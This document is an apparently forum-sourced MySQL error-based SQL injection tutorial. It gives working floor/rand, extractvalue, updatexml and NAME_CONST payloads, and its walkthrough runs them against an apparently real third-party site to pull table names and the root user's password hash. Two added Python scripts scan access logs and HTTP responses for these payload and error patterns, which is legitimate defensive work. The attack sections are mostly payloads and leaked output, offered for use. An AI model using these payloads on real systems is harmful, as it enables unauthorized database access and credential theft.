1. Error-based injection via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)))

Example:

First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is disclosed in the error message. To retrieve other data, replace the version() call in that position with the desired subquery.

For example, to retrieve the administrator user name and password:

Method 1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)))

Actual test:
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:
and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'

More collected examples:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

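From the defender's side, all four error-based families collected above (floor(rand(0)*2) with group by, extractvalue, updatexml and name_const) have a distinctive shape in the request query string, so they are cheap to spot in web server access logs. The following Python script is an added example, not code from the original post: it URL-decodes each query string, normalises whitespace and case, and tags each request with the technique family it matches. The log lines, client addresses and paths are constructed for the example, and the function names (normalise, classify, scan_log) are the example's own.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the MySQL error-based injection families shown on the page.
# Each entry: (label, regex applied to the normalised, lower-cased query string).
# The floor/rand pattern accepts either order, since the page shows both
# "floor(rand(0)*2) ... group by" and "group by concat(..., floor(rand(0)*2))".
SIGNATURES = [
    ("floor_rand_groupby", re.compile(
        r"floor\s*\(\s*rand\s*\(.*?group\s+by|group\s+by.*?floor\s*\(\s*rand\s*\(", re.S)),
    ("extractvalue", re.compile(r"\bextractvalue\s*\(")),
    ("updatexml", re.compile(r"\bupdatexml\s*\(")),
    ("name_const", re.compile(r"\bname_const\s*\(")),
]


def normalise(query_string):
    """Decode '+' and %xx escapes (twice, to catch double-encoded input),
    collapse runs of whitespace and lower-case, so spacing and case tricks
    do not evade the signatures."""
    decoded = unquote_plus(unquote_plus(query_string))
    return re.sub(r"\s+", " ", decoded).lower()


def classify(query_string):
    """Return the list of technique labels matched by one query string."""
    text = normalise(query_string)
    return [label for label, rx in SIGNATURES if rx.search(text)]


# Minimal parser for common-log-format lines: client, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3})')


def scan_log(lines):
    """Yield one finding per request whose query string matches a signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        client, _method, target, status = m.groups()
        path, _, qs = target.partition("?")
        labels = classify(qs)
        if labels:
            hits.append({"client": client, "path": path,
                         "status": int(status), "techniques": labels})
    return hits


# Constructed sample log: the payload shapes are those shown on the page,
# the hosts, paths and timestamps are invented for this example.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2010:13:55:36 +0000] "GET /detail.php?id=330&sid=19&cid=261 HTTP/1.1" 200 5123',
    '203.0.113.5 - - [10/Oct/2010:13:55:40 +0000] "GET /detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 812',
    '198.51.100.7 - - [10/Oct/2010:13:56:01 +0000] "GET /article.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 801',
    '198.51.100.7 - - [10/Oct/2010:13:56:05 +0000] "GET /article.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20user()))) HTTP/1.1" 500 790',
    '192.0.2.9 - - [10/Oct/2010:13:57:12 +0000] "GET /article.php?id=1&sort=updated HTTP/1.1" 200 4410',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A 500 status on a tagged request is the stronger signal: it means the database raised the error the payload was designed to provoke, so the parameter is almost certainly injectable and the response should be checked for an echoed MySQL error.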
MySQL error-based injection trick for newer versions: injection via NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Related information

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|------|
| TEST |
|------|
| 1    |
|------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--+

VAR = Your MySQL variable.
MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here, so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time..

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
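Every step of the walkthrough above only works because the application prints the raw MySQL error (mysql_error() or equivalent) into the page, and the same is true of the floor, extractvalue and updatexml variants in the first part of the post. The script below is an added example, not code from the post or its author: it audits HTTP response bodies for the three error strings the page shows (Duplicate entry ... for key 'group_key', XPATH syntax error, Duplicate column name), pulls out the value that leaked, and rates the disclosure so the fix (never echo database errors to the client; log them server-side and return a generic message) can be prioritised. The responses, URLs and the password hash are constructed for the example; leaked_error, disclosure_severity and audit_responses are the example's own names.

```python
import re

# Error strings MySQL produces for the error-based families on the page.
# An application that echoes the DB error puts these verbatim into the body.
# Newer MySQL releases write the key as '<group_key>', hence the optional brackets.
LEAK_PATTERNS = [
    ("floor_rand_groupby", re.compile(r"Duplicate entry '(.*?)' for key '<?group_key>?'")),
    ("xpath", re.compile(r"XPATH syntax error: '(.*?)'")),   # extractvalue / updatexml
    ("name_const", re.compile(r"Duplicate column name '(.*?)'")),
]

MYSQL_HASH = re.compile(r"\*[0-9A-F]{40}")          # PASSWORD()-style hash from mysql.user
MYSQL_VERSION = re.compile(r"\b\d+\.\d+\.\d+[\w.-]*")  # e.g. 5.0.27-community-nt


def leaked_error(body):
    """Return {'family', 'value'} for the first echoed MySQL error, else None."""
    for family, rx in LEAK_PATTERNS:
        m = rx.search(body)
        if not m:
            continue
        value = m.group(1)
        if family == "floor_rand_groupby" and value[-1:] in "01":
            # The payload appends floor(rand(0)*2), i.e. a trailing 0 or 1,
            # to the extracted value ('admin8881' on the page is 'admin888').
            value = value[:-1]
        elif family == "xpath":
            # The page's payloads prefix the value with 0x5c ('\') or 0x3a (':')
            # so the XPath parser fails on it; strip that separator.
            value = value.lstrip("\\:")
        return {"family": family, "value": value}
    return None


def disclosure_severity(value):
    """Rough triage of what an echoed error gave away."""
    if MYSQL_HASH.search(value):
        return "critical: credential hash disclosed"
    if MYSQL_VERSION.search(value):
        return "medium: server version disclosed"
    return "high: application data disclosed"


def audit_responses(responses):
    """One finding per response whose body echoes a MySQL error."""
    findings = []
    for r in responses:
        leak = leaked_error(r["body"])
        if leak:
            findings.append({"url": r["url"], **leak,
                             "severity": disclosure_severity(leak["value"])})
    return findings


# Constructed sample responses; the hash is a placeholder, not a real credential.
FAKE_HASH = "*0123456789ABCDEF0123456789ABCDEF01234567"
SAMPLE_RESPONSES = [
    {"url": "/detail.php?id=330",
     "body": "<html><body><h1>Article</h1><p>do it</p></body></html>"},
    {"url": "/detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--",
     "body": "Error:Duplicate column name '5.0.27-community-nt'"},
    {"url": "/article.php?id=1+and+(select+1+from+(select+count(*),concat((select+pass+from+admin+limit+1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)",
     "body": "ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'"},
    {"url": "/article.php?id=1+and+1=(updatexml(1,concat(0x3a,(select+user())),1))",
     "body": "ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'"},
    {"url": "/detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--",
     "body": "Error:Duplicate column name 'root ~ " + FAKE_HASH + "'"},
]

if __name__ == "__main__":
    for finding in audit_responses(SAMPLE_RESPONSES):
        print(finding)
```

Run against a crawl of your own application's responses (or a proxy's saved history), any finding at all means database errors reach the client; the severity only says how bad the particular leak was, the remediation is the same in every case.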